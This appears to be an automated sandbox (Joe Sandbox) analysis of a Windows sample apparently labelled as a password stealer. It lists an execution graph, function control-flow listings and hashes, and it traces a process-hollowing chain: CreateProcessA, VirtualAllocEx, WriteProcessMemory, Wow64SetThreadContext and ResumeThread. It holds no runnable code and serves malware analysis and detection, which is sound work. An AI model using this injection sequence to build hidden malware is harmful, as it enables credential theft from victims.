                            execution_graph 22937 1a1ad90 22940 1a1ae79 22937->22940 22938 1a1ad9f 22941 1a1ae99 22940->22941 22942 1a1aebc 22940->22942 22941->22942 22948 1a1b111 22941->22948 22952 1a1b120 22941->22952 22942->22938 22943 1a1aeb4 22943->22942 22944 1a1b0c0 GetModuleHandleW 22943->22944 22945 1a1b0ed 22944->22945 22945->22938 22949 1a1b134 22948->22949 22951 1a1b159 22949->22951 22956 1a1a248 22949->22956 22951->22943 22953 1a1b134 22952->22953 22954 1a1b159 22953->22954 22955 1a1a248 LoadLibraryExW 22953->22955 22954->22943 22955->22954 22957 1a1b300 LoadLibraryExW 22956->22957 22959 1a1b379 22957->22959 22959->22951 22672 3372350 22673 3372359 22672->22673 22674 33726e1 22673->22674 22678 3372ca0 22673->22678 22699 3372cfe 22673->22699 22721 3372c90 22673->22721 22679 3372cba 22678->22679 22680 3372cde 22679->22680 22742 3373198 22679->22742 22749 33737b8 22679->22749 22754 337399c 22679->22754 22762 33735bc 22679->22762 22769 33731f2 22679->22769 22776 3373915 22679->22776 22780 3373736 22679->22780 22787 33736d7 22679->22787 22794 3373488 22679->22794 22799 3373089 22679->22799 22804 33730a9 22679->22804 22809 3373229 22679->22809 22814 337322d 22679->22814 22818 337318e 22679->22818 22825 3373362 22679->22825 22830 3373284 22679->22830 22838 3373125 22679->22838 22846 33738d8 22679->22846 22680->22673 22700 3372c8c 22699->22700 22701 3372d01 22699->22701 22702 33736d7 4 API calls 22700->22702 22703 3373736 4 API calls 22700->22703 22704 3373915 2 API calls 22700->22704 22705 33731f2 4 API calls 22700->22705 22706 33735bc 4 API calls 22700->22706 22707 337399c 4 API calls 22700->22707 22708 33737b8 2 API calls 22700->22708 22709 3373198 4 API calls 22700->22709 22710 33738d8 2 API calls 22700->22710 22711 3373125 2 API calls 22700->22711 22712 3373284 4 API calls 22700->22712 22713 3373362 2 API calls 22700->22713 22714 337318e 4 API calls 22700->22714 22715 337322d 2 API calls 22700->22715 22716 3372cde 22700->22716 22717 3373229 2 API calls 22700->22717 22718 33730a9 2 API calls 22700->22718 22719 3373089 2 API calls 22700->22719 22720 3373488 2 API calls 22700->22720 22701->22673 22702->22716 22703->22716 22704->22716 22705->22716 22706->22716 22707->22716 22708->22716 22709->22716 22710->22716 22711->22716 22712->22716 22713->22716 22714->22716 22715->22716 22716->22673 22717->22716 22718->22716 22719->22716 22720->22716 22722 3372ca0 22721->22722 22723 3372cde 22722->22723 22724 33736d7 4 API calls 22722->22724 22725 3373736 4 API calls 22722->22725 22726 3373915 2 API calls 22722->22726 22727 33731f2 4 API calls 22722->22727 22728 33735bc 4 API calls 22722->22728 22729 337399c 4 API calls 22722->22729 22730 33737b8 2 API calls 22722->22730 22731 3373198 4 API calls 22722->22731 22732 33738d8 2 API calls 22722->22732 22733 3373125 2 API calls 22722->22733 22734 3373284 4 API calls 22722->22734 22735 3373362 2 API calls 22722->22735 22736 337318e 4 API calls 22722->22736 22737 337322d 2 API calls 22722->22737 22738 3373229 2 API calls 22722->22738 22739 33730a9 2 API calls 22722->22739 22740 3373089 2 API calls 22722->22740 22741 3373488 2 API calls 22722->22741 22723->22673 22724->22723 22725->22723 22726->22723 22727->22723 22728->22723 22729->22723 22730->22723 22731->22723 22732->22723 22733->22723 22734->22723 22735->22723 22736->22723 22737->22723 22738->22723 22739->22723 22740->22723 22741->22723 22743 33731ae 22742->22743 22744 337380d 22743->22744 22851 33715b1 22743->22851 22855 33715b8 22743->22855 22859 3371aa0 22743->22859 22863 3371a99 22743->22863 22750 33737be 22749->22750 22867 3371d20 22750->22867 22871 3371d28 22750->22871 22751 33737e1 22755 3373a19 22754->22755 22756 3373184 22754->22756 22757 337354e 22756->22757 22758 33715b1 ResumeThread 22756->22758 22759 33715b8 ResumeThread 22756->22759 22760 3371aa0 Wow64SetThreadContext 22756->22760 22761 3371a99 Wow64SetThreadContext 22756->22761 22758->22756 22759->22756 22760->22756 22761->22756 22763 33731b3 22762->22763 22764 337380d 22763->22764 22765 3371aa0 Wow64SetThreadContext 22763->22765 22766 3371a99 Wow64SetThreadContext 22763->22766 22767 33715b1 ResumeThread 22763->22767 22768 33715b8 ResumeThread 22763->22768 22765->22763 22766->22763 22767->22763 22768->22763 22770 33731ae 22769->22770 22771 337380d 22770->22771 22772 33715b1 ResumeThread 22770->22772 22773 33715b8 ResumeThread 22770->22773 22774 3371aa0 Wow64SetThreadContext 22770->22774 22775 3371a99 Wow64SetThreadContext 22770->22775 22771->22680 22772->22770 22773->22770 22774->22770 22775->22770 22875 3373d51 22776->22875 22880 3373d60 22776->22880 22777 33732f3 22783 3371aa0 Wow64SetThreadContext 22780->22783 22784 3371a99 Wow64SetThreadContext 22780->22784 22781 337380d 22782 33731b3 22782->22780 22782->22781 22785 33715b1 ResumeThread 22782->22785 22786 33715b8 ResumeThread 22782->22786 22783->22782 22784->22782 22785->22782 22786->22782 22788 3373184 22787->22788 22789 337354e 22788->22789 22790 3371aa0 Wow64SetThreadContext 22788->22790 22791 3371a99 Wow64SetThreadContext 22788->22791 22792 33715b1 ResumeThread 22788->22792 22793 33715b8 ResumeThread 22788->22793 22790->22788 22791->22788 22792->22788 22793->22788 22795 337348e 22794->22795 22885 3371c30 22795->22885 22889 3371c38 22795->22889 22796 33733a6 22796->22680 22800 3373095 22799->22800 22800->22680 22801 3373c2e 22800->22801 22893 3371eb4 22800->22893 22897 3371ec0 22800->22897 22801->22680 22805 3373095 22804->22805 22805->22680 22806 3373c2e 22805->22806 22807 3371eb4 CreateProcessA 22805->22807 22808 3371ec0 CreateProcessA 22805->22808 22806->22680 22807->22805 22808->22805 22810 337322f 22809->22810 22811 3373251 22810->22811 22812 3371c30 WriteProcessMemory 22810->22812 22813 3371c38 WriteProcessMemory 22810->22813 22811->22680 22811->22811 22812->22811 22813->22811 22816 3371c30 WriteProcessMemory 22814->22816 22817 3371c38 WriteProcessMemory 22814->22817 22815 3373251 22815->22680 22815->22815 22816->22815 22817->22815 22819 337318f 22818->22819 22820 337354e 22819->22820 22821 33715b1 ResumeThread 22819->22821 22822 33715b8 ResumeThread 22819->22822 22823 3371aa0 Wow64SetThreadContext 22819->22823 22824 3371a99 Wow64SetThreadContext 22819->22824 22821->22819 22822->22819 22823->22819 22824->22819 22826 3373389 22825->22826 22828 3371c30 WriteProcessMemory 22826->22828 22829 3371c38 WriteProcessMemory 22826->22829 22827 337341f 22827->22680 22828->22827 22829->22827 22831 3373239 22830->22831 22831->22830 22901 3371b71 22831->22901 22905 3371b78 22831->22905 22832 33732b4 22833 33733a6 22832->22833 22834 3371c30 WriteProcessMemory 22832->22834 22835 3371c38 WriteProcessMemory 22832->22835 22833->22680 22834->22833 22835->22833 22839 337312b 22838->22839 22842 3371eb4 CreateProcessA 22839->22842 22843 3371ec0 CreateProcessA 22839->22843 22840 3373095 22840->22680 22841 3373c2e 22840->22841 22844 3371eb4 CreateProcessA 22840->22844 22845 3371ec0 CreateProcessA 22840->22845 22841->22680 22842->22840 22843->22840 22844->22840 22845->22840 22847 33738db 22846->22847 22848 33732f3 22847->22848 22849 3373d51 2 API calls 22847->22849 22850 3373d60 2 API calls 22847->22850 22849->22848 22850->22848 22852 33715b8 ResumeThread 22851->22852 22854 3371629 22852->22854 22854->22743 22856 33715f8 ResumeThread 22855->22856 22858 3371629 22856->22858 22858->22743 22860 3371ae5 Wow64SetThreadContext 22859->22860 22862 3371b2d 22860->22862 22862->22743 22864 3371ae5 Wow64SetThreadContext 22863->22864 22866 3371b2d 22864->22866 22866->22743 22868 3371d73 ReadProcessMemory 22867->22868 22870 3371db7 22868->22870 22870->22751 22872 3371d73 ReadProcessMemory 22871->22872 22874 3371db7 22872->22874 22874->22751 22876 3373d60 22875->22876 22878 3371aa0 Wow64SetThreadContext 22876->22878 22879 3371a99 Wow64SetThreadContext 22876->22879 22877 3373d8b 22877->22777 22878->22877 22879->22877 22881 3373d75 22880->22881 22883 3371aa0 Wow64SetThreadContext 22881->22883 22884 3371a99 Wow64SetThreadContext 22881->22884 22882 3373d8b 22882->22777 22883->22882 22884->22882 22886 3371c80 WriteProcessMemory 22885->22886 22888 3371cd7 22886->22888 22888->22796 22890 3371c80 WriteProcessMemory 22889->22890 22892 3371cd7 22890->22892 22892->22796 22894 3371ec0 CreateProcessA 22893->22894 22896 337210b 22894->22896 22898 3371f49 CreateProcessA 22897->22898 22900 337210b 22898->22900 22902 3371b78 VirtualAllocEx 22901->22902 22904 3371bf5 22902->22904 22904->22832 22906 3371bb8 VirtualAllocEx 22905->22906 22908 3371bf5 22906->22908 22908->22832 22909 1a14668 22910 1a1467a 22909->22910 22911 1a14686 22910->22911 22913 1a14778 22910->22913 22914 1a1479d 22913->22914 22918 1a14888 22914->22918 22922 1a14878 22914->22922 22920 1a148af 22918->22920 22919 1a1498c 22919->22919 22920->22919 22926 1a144e4 22920->22926 22924 1a148af 22922->22924 22923 1a1498c 22923->22923 22924->22923 22925 1a144e4 CreateActCtxA 22924->22925 22925->22923 22927 1a15918 CreateActCtxA 22926->22927 22929 1a159db 22927->22929 22960 1a1d518 22961 1a1d55e 22960->22961 22965 1a1d6f8 22961->22965 22968 1a1d6ea 22961->22968 22962 1a1d64b 22966 1a1d726 22965->22966 22971 1a1b870 22965->22971 22966->22962 22969 1a1b870 DuplicateHandle 22968->22969 22970 1a1d726 22969->22970 22970->22962 22972 1a1d760 DuplicateHandle 22971->22972 22973 1a1d7f6 22972->22973 22973->22966 22930 3374278 22931 3374403 22930->22931 22933 337429e 22930->22933 22933->22931 22934 3373e70 22933->22934 22935 33744f8 PostMessageW 22934->22935 22936 3374564 22935->22936 22936->22933

                            Executed Functions

                            Function 03374FF8 Relevance: 1.9, Strings: 1, Instructions: 622COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 384 3374ff8-337501a 385 3375020-337505b call 3374d78 call 3374d88 call 3374d98 384->385 386 33753ca-33753cf 384->386 398 337506e-337508e 385->398 399 337505d-3375067 385->399 388 33753d1-33753d3 386->388 389 33753d9-33753dc 386->389 388->389 561 33753de call 3375410 389->561 562 33753de call 3374fea 389->562 563 33753de call 3374ff8 389->563 392 33753e4-33753ec 394 33753f2-33753f9 392->394 401 33750a1-33750c1 398->401 402 3375090-337509a 398->402 399->398 404 33750d4-33750f4 401->404 405 33750c3-33750cd 401->405 402->401 407 3375107-3375110 call 3374da8 404->407 408 33750f6-3375100 404->408 405->404 411 3375134-337513d call 3374db8 407->411 412 3375112-337512d call 3374da8 407->412 408->407 417 3375161-337516a call 3374dc8 411->417 418 337513f-337515a call 3374db8 411->418 412->411 424 3375175-3375191 417->424 425 337516c-3375170 call 3374dd8 417->425 418->417 429 3375193-3375199 424->429 430 33751a9-33751ad 424->430 425->424 431 337519d-337519f 429->431 432 337519b 429->432 433 33751c7-337520f 430->433 434 33751af-33751c0 call 3374de8 430->434 431->430 432->430 440 3375233-337523a 433->440 441 3375211 433->441 434->433 443 3375251-337525f call 3374df8 440->443 444 337523c-337524b 440->444 442 3375214-337521a 441->442 446 3375220-3375226 442->446 447 33753fa-3375439 442->447 452 3375261-3375263 443->452 453 3375269-3375293 call 3374e08 443->453 444->443 449 3375230-3375231 446->449 450 3375228-337522a 446->450 455 337543b-337545c 447->455 456 3375498-33754a8 447->456 449->440 449->442 450->449 452->453 469 3375295-33752a3 453->469 470 33752c0-33752dc 453->470 455->456 461 337545e-3375464 455->461 463 337567e-3375685 456->463 464 33754ae-33754b8 456->464 467 3375466-3375468 461->467 468 3375472-3375477 461->468 465 3375687-337568f call 3374f3c 463->465 466 3375694-33756a7 463->466 471 33754c2-33754cc 464->471 472 33754ba-33754c1 464->472 465->466 467->468 474 3375484-3375491 468->474 475 3375479-337547d 468->475 469->470 485 33752a5-33752b9 469->485 482 33752ef-3375316 call 3374e18 470->482 483 33752de-33752e8 470->483 476 33754d2-3375512 471->476 477 33756b1-3375752 471->477 474->456 475->474 502 3375514-337551a 476->502 503 337552a-337552e 476->503 532 3375754 477->532 533 3375759-337578f 477->533 494 337532e-3375332 482->494 495 3375318-337531e 482->495 483->482 485->470 499 3375334-3375346 494->499 500 337534d-3375369 494->500 497 3375322-3375324 495->497 498 3375320 495->498 497->494 498->494 499->500 512 3375381-3375385 500->512 513 337536b-3375371 500->513 507 337551e-3375520 502->507 508 337551c 502->508 509 3375530-3375555 503->509 510 337555b-3375573 call 3374f2c 503->510 507->503 508->503 509->510 524 3375575-337557a 510->524 525 3375580-3375588 510->525 512->394 518 3375387-3375395 512->518 516 3375375-3375377 513->516 517 3375373 513->517 516->512 517->512 526 33753a7-33753ab 518->526 527 3375397-33753a5 518->527 524->525 529 337559e-33755bd 525->529 530 337558a-3375598 525->530 531 33753b1-33753c9 526->531 527->526 527->531 537 33755d5-33755d9 529->537 538 33755bf-33755c5 529->538 530->529 532->533 546 3375791 533->546 547 3375799 533->547 543 3375632-337567b 537->543 544 33755db-33755e8 537->544 541 33755c7 538->541 542 33755c9-33755cb 538->542 541->537 542->537 543->463 551 337561e-337562b 544->551 552 33755ea-337561c 544->552 546->547 553 337579a 547->553 551->543 552->551 553->553 561->392 562->392 563->392
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: 6
                            • API String ID: 0-498629140
                            • Opcode ID: 542643368bcac6b707c5b89da82f8105d483679976807011ca6defec9f6d38a4
                            • Instruction ID: 36347247fd8face46b92f92d978a697f234b4c2846fe123fd9e4466fdbb64e17
                            • Opcode Fuzzy Hash: 542643368bcac6b707c5b89da82f8105d483679976807011ca6defec9f6d38a4
                            • Instruction Fuzzy Hash: A2328C70B012449FEB29DB79C990BAEB7F6AF89310F144469E5069B3A5DF38ED01CB50
                            Function 03371EB4 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 564 3371eb4-3371f55 567 3371f57-3371f61 564->567 568 3371f8e-3371fae 564->568 567->568 569 3371f63-3371f65 567->569 573 3371fe7-3372016 568->573 574 3371fb0-3371fba 568->574 571 3371f67-3371f71 569->571 572 3371f88-3371f8b 569->572 575 3371f75-3371f84 571->575 576 3371f73 571->576 572->568 584 337204f-3372109 CreateProcessA 573->584 585 3372018-3372022 573->585 574->573 577 3371fbc-3371fbe 574->577 575->575 578 3371f86 575->578 576->575 579 3371fe1-3371fe4 577->579 580 3371fc0-3371fca 577->580 578->572 579->573 582 3371fce-3371fdd 580->582 583 3371fcc 580->583 582->582 586 3371fdf 582->586 583->582 596 3372112-3372198 584->596 597 337210b-3372111 584->597 585->584 587 3372024-3372026 585->587 586->579 589 3372049-337204c 587->589 590 3372028-3372032 587->590 589->584 591 3372036-3372045 590->591 592 3372034 590->592 591->591 593 3372047 591->593 592->591 593->589 607 337219a-337219e 596->607 608 33721a8-33721ac 596->608 597->596 607->608 609 33721a0 607->609 610 33721ae-33721b2 608->610 611 33721bc-33721c0 608->611 609->608 610->611 614 33721b4 610->614 612 33721c2-33721c6 611->612 613 33721d0-33721d4 611->613 612->613 615 33721c8 612->615 616 33721e6-33721ed 613->616 617 33721d6-33721dc 613->617 614->611 615->613 618 3372204 616->618 619 33721ef-33721fe 616->619 617->616 621 3372205 618->621 619->618 621->621
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 033720F6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: b049f5eec021797fa36134a682cc3c17eb3ccaf394c976632f41b4deb4ea7681
                            • Instruction ID: 4bac197f6b55efc7a3f79139d5e0df38555c60ab2a9564ad5cb455865312774e
                            • Opcode Fuzzy Hash: b049f5eec021797fa36134a682cc3c17eb3ccaf394c976632f41b4deb4ea7681
                            • Instruction Fuzzy Hash: 6BA15E71D002599FDB24DF68CC81BDEBBB2BF48310F148669E818A7250DB789985CF91
                            Function 03371EC0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 622 3371ec0-3371f55 624 3371f57-3371f61 622->624 625 3371f8e-3371fae 622->625 624->625 626 3371f63-3371f65 624->626 630 3371fe7-3372016 625->630 631 3371fb0-3371fba 625->631 628 3371f67-3371f71 626->628 629 3371f88-3371f8b 626->629 632 3371f75-3371f84 628->632 633 3371f73 628->633 629->625 641 337204f-3372109 CreateProcessA 630->641 642 3372018-3372022 630->642 631->630 634 3371fbc-3371fbe 631->634 632->632 635 3371f86 632->635 633->632 636 3371fe1-3371fe4 634->636 637 3371fc0-3371fca 634->637 635->629 636->630 639 3371fce-3371fdd 637->639 640 3371fcc 637->640 639->639 643 3371fdf 639->643 640->639 653 3372112-3372198 641->653 654 337210b-3372111 641->654 642->641 644 3372024-3372026 642->644 643->636 646 3372049-337204c 644->646 647 3372028-3372032 644->647 646->641 648 3372036-3372045 647->648 649 3372034 647->649 648->648 650 3372047 648->650 649->648 650->646 664 337219a-337219e 653->664 665 33721a8-33721ac 653->665 654->653 664->665 666 33721a0 664->666 667 33721ae-33721b2 665->667 668 33721bc-33721c0 665->668 666->665 667->668 671 33721b4 667->671 669 33721c2-33721c6 668->669 670 33721d0-33721d4 668->670 669->670 672 33721c8 669->672 673 33721e6-33721ed 670->673 674 33721d6-33721dc 670->674 671->668 672->670 675 3372204 673->675 676 33721ef-33721fe 673->676 674->673 678 3372205 675->678 676->675 678->678
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 033720F6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 36a473e9c6df59bbca619571503c014781a94000ff00bbd762d0a5a400c8b2e5
                            • Instruction ID: ff3c21f960b4e75e28195ba1f28e3657594a98bc21b8dab548b5250e3c89019f
                            • Opcode Fuzzy Hash: 36a473e9c6df59bbca619571503c014781a94000ff00bbd762d0a5a400c8b2e5
                            • Instruction Fuzzy Hash: 0D914E71D002599FDB24DF68CC81BDEBBB6BF48310F1486A9E818A7250DB789985CF91
                            Function 01A1AE79 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 679 1a1ae79-1a1ae97 680 1a1aec3-1a1aec7 679->680 681 1a1ae99-1a1aea6 call 1a1a1e0 679->681 682 1a1aec9-1a1aed3 680->682 683 1a1aedb-1a1af1c 680->683 688 1a1aea8 681->688 689 1a1aebc 681->689 682->683 690 1a1af29-1a1af37 683->690 691 1a1af1e-1a1af26 683->691 734 1a1aeae call 1a1b111 688->734 735 1a1aeae call 1a1b120 688->735 689->680 692 1a1af39-1a1af3e 690->692 693 1a1af5b-1a1af5d 690->693 691->690 697 1a1af40-1a1af47 call 1a1a1ec 692->697 698 1a1af49 692->698 696 1a1af60-1a1af67 693->696 694 1a1aeb4-1a1aeb6 694->689 695 1a1aff8-1a1b0b8 694->695 729 1a1b0c0-1a1b0eb GetModuleHandleW 695->729 730 1a1b0ba-1a1b0bd 695->730 700 1a1af74-1a1af7b 696->700 701 1a1af69-1a1af71 696->701 699 1a1af4b-1a1af59 697->699 698->699 699->696 703 1a1af88-1a1af91 call 1a1a1fc 700->703 704 1a1af7d-1a1af85 700->704 701->700 710 1a1af93-1a1af9b 703->710 711 1a1af9e-1a1afa3 703->711 704->703 710->711 712 1a1afc1-1a1afce 711->712 713 1a1afa5-1a1afac 711->713 719 1a1aff1-1a1aff7 712->719 720 1a1afd0-1a1afee 712->720 713->712 715 1a1afae-1a1afbe call 1a1a20c call 1a1a21c 713->715 715->712 720->719 731 1a1b0f4-1a1b108 729->731 732 1a1b0ed-1a1b0f3 729->732 730->729 732->731 734->694 735->694
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 01A1B0DE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: d34dddcbd42eadf259ff3e96b866c91f5055ad541b0ef6d8a7e3df6dd0bacb18
                            • Instruction ID: d86a657a4306ed11f7b51061de43166c70b58050e8d8844fce73710f14205073
                            • Opcode Fuzzy Hash: d34dddcbd42eadf259ff3e96b866c91f5055ad541b0ef6d8a7e3df6dd0bacb18
                            • Instruction Fuzzy Hash: 1D8158B0A01B458FD724CF6AD44475ABBF1FF48300F048A2ED48ACBA94DB34E945CB90
                            Function 01A15A84 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 736 1a15a84-1a15a8f 738 1a15b09-1a15b23 736->738
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 75564e62b542a16e06bf74b6b82badd88a3c272fd640a1d5bdbbeac88524c309
                            • Instruction ID: a8af46bf0994916cc51866599e0f578d6d1ef9a799cbad123e37f5eb5e85ef96
                            • Opcode Fuzzy Hash: 75564e62b542a16e06bf74b6b82badd88a3c272fd640a1d5bdbbeac88524c309
                            • Instruction Fuzzy Hash: 5641BCB2C05349CFDB14CFA9C88979EBBB5EF87314F14808AC405AB259D779694ACB41
                            Function 01A144E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 740 1a144e4-1a159d9 CreateActCtxA 743 1a159e2-1a15a3c 740->743 744 1a159db-1a159e1 740->744 751 1a15a4b-1a15a4f 743->751 752 1a15a3e-1a15a41 743->752 744->743 753 1a15a51-1a15a5d 751->753 754 1a15a60 751->754 752->751 753->754 756 1a15a61 754->756 756->756
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 01A159C9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 2f0d3fe0fad7494c925358256252405926435dc068fbae5da86eccc0e87fde65
                            • Instruction ID: cc677dce7dcfa0a34d027d5750565cf1ed0961242fa688470fb477c7a429dca5
                            • Opcode Fuzzy Hash: 2f0d3fe0fad7494c925358256252405926435dc068fbae5da86eccc0e87fde65
                            • Instruction Fuzzy Hash: C141D2B1C00759CBDB24CFAAC884B8EBBF6BF89304F24805AD408AB255DB756945CF90
                            Function 01A1590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 757 1a1590c 758 1a15911-1a159d9 CreateActCtxA 757->758 760 1a159e2-1a15a3c 758->760 761 1a159db-1a159e1 758->761 768 1a15a4b-1a15a4f 760->768 769 1a15a3e-1a15a41 760->769 761->760 770 1a15a51-1a15a5d 768->770 771 1a15a60 768->771 769->768 770->771 773 1a15a61 771->773 773->773
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 01A159C9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 444d8df438a012759ef8e8ac2a517daa2bedd80de753431bec991227bc33ff0b
                            • Instruction ID: 296b23e0ef1aa53ce0b105a7fbdbf7b77953eff370b63d9ddf040ef54234d280
                            • Opcode Fuzzy Hash: 444d8df438a012759ef8e8ac2a517daa2bedd80de753431bec991227bc33ff0b
                            • Instruction Fuzzy Hash: AA41D5B1D00659CEDB24CFA9C884BDEBBF5FF89304F24805AD408AB254DB756945CF90
                            Function 03371C30 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 774 3371c30-3371c86 776 3371c96-3371cd5 WriteProcessMemory 774->776 777 3371c88-3371c94 774->777 779 3371cd7-3371cdd 776->779 780 3371cde-3371d0e 776->780 777->776 779->780
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 03371CC8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 9ea7bc446c19600a0d17f3c0545d9ec3bc600154a6202cb251ce9a8dcf7f9714
                            • Instruction ID: 5b9836c27005fa97d7b22366b870ba7c53989826415ae006998d77c7d67f92d8
                            • Opcode Fuzzy Hash: 9ea7bc446c19600a0d17f3c0545d9ec3bc600154a6202cb251ce9a8dcf7f9714
                            • Instruction Fuzzy Hash: 7A215AB5D002598FDB10CFA9C885BEEBBF5FF48310F148829E959A7240D7799941CFA0
                            Function 03371C38 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 784 3371c38-3371c86 786 3371c96-3371cd5 WriteProcessMemory 784->786 787 3371c88-3371c94 784->787 789 3371cd7-3371cdd 786->789 790 3371cde-3371d0e 786->790 787->786 789->790
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 03371CC8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 246aeee0347d37c8fe5db06ab2bd084e0212b1c2333e3d76fe3a1ecf8e980a07
                            • Instruction ID: d52edc36a816b4893f670dc542817b79fa735cd68df8f0db61d9ba9c61a220f3
                            • Opcode Fuzzy Hash: 246aeee0347d37c8fe5db06ab2bd084e0212b1c2333e3d76fe3a1ecf8e980a07
                            • Instruction Fuzzy Hash: EB212A71D003599FDB10CFA9C985BEEBBF5FF48320F148829E518A7240D7789944CBA0
                            Function 03371D20 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 800 3371d20-3371db5 ReadProcessMemory 803 3371db7-3371dbd 800->803 804 3371dbe-3371dee 800->804 803->804
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03371DA8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: 05fcfe27dfd5a3aaca94e08f001eade874c2bc093b3785e8e077b11e5634613b
                            • Instruction ID: bab4fabb5f4f59f2e2d2e81a559c2738084c5eba2367383a6e7780844004ba8c
                            • Opcode Fuzzy Hash: 05fcfe27dfd5a3aaca94e08f001eade874c2bc093b3785e8e077b11e5634613b
                            • Instruction Fuzzy Hash: 45215971D002599FDB10DFAAC881AEEFBF5FF48320F148429E919A7250D7399900CFA0
                            Function 01A1B870 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 794 1a1b870-1a1d7f4 DuplicateHandle 796 1a1d7f6-1a1d7fc 794->796 797 1a1d7fd-1a1d81a 794->797 796->797
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01A1D726,?,?,?,?,?), ref: 01A1D7E7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
